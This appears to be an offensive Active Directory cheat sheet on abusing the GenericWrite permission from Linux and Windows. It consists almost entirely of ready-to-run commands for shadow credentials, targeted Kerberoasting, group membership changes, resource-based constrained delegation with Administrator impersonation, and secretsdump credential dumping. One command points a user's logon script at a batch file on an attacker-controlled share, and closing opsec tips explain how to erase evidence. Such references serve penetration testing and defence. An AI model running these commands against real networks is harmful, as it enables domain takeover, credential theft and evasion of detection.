GenericWrite

Source can write to any non-protected attribute on the target object

Applies to: User/Group/Computer → User, Group, Computer

Linux Abuse

Target: User — shadow credentials (preferred, stealthy)

certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-user> -dc-ip <dc-ip>
# Outputs NT hash — use for PTH or request TGT

Target: User — targeted Kerberoast (write servicePrincipalName)

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    set object <target-user> servicePrincipalName -v 'http/fake.corp.local'
GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <dc-ip> -request-user <target-user> -outputfile hash.txt
# Cleanup:
bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    remove object <target-user> servicePrincipalName -v 'http/fake.corp.local'

Target: User — write logon script

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    set object <target-user> scriptPath -v '\\<attacker-ip>\share\evil.bat'

Target: Group — add member (write member attribute)

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    add groupMember '<target-group>' '<username>'

Target: Computer — shadow credentials

certipy-ad shadow auto -u <username>@<domain> -p '<password>' -account <target-computer$> -dc-ip <dc-ip>

Target: Computer — RBCD (write msDS-AllowedToActOnBehalfOfOtherIdentity)

# 1. Create attacker computer account
addcomputer.py -computer-name 'ATTACKPC$' -computer-pass '<new-password>' -dc-ip <dc-ip> '<domain>/<username>:<password>'

# 2. Write RBCD attribute
rbcd.py -f ATTACKPC -t <target-computer> -dc-ip <dc-ip> '<domain>/<username>:<password>'

# 3. Impersonate admin
getST.py -spn cifs/<target-computer>.<domain> -impersonate Administrator -dc-ip <dc-ip> '<domain>/ATTACKPC$:<new-password>'
export KRB5CCNAME=Administrator@cifs_<target-computer>.<domain>@<domain>.ccache
secretsdump.py -k -no-pass <target-computer>.<domain>

Windows Abuse

Target: User — shadow credentials

# Whisker
Whisker.exe add /target:<target-user> /domain:<domain> /dc:<dc-ip>

Target: User — targeted Kerberoast

Set-DomainObject -Identity <target-user> -Set @{serviceprincipalname='http/fake'} -Credential $cred
Get-DomainSPNTicket -Identity <target-user> -OutputFormat Hashcat | Select-Object -Expand Hash
# Cleanup:
Set-DomainObject -Identity <target-user> -Clear serviceprincipalname -Credential $cred

Target: Group — add member

Add-DomainGroupMember -Identity '<target-group>' -Members '<username>' -Credential $cred

Target: Computer — RBCD

$AttackerSID = Get-DomainComputer 'ATTACKPC$' -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$AttackerSID)"
$SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <target-computer> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Rubeus — RBCD S4U2Self

Rubeus.exe s4u /user:ATTACKPC$ /rc4:<ntlm-hash> /impersonateuser:Administrator /msdsspn:cifs/<target-computer>.<domain> /nowrap

Opsec

SPN writes for Kerberoasting are logged (LDAP modify on target object); clean up the SPN after roasting
Shadow credentials (msDS-KeyCredentialLink write) leave an artifact in the attribute — clean with certipy-ad shadow clear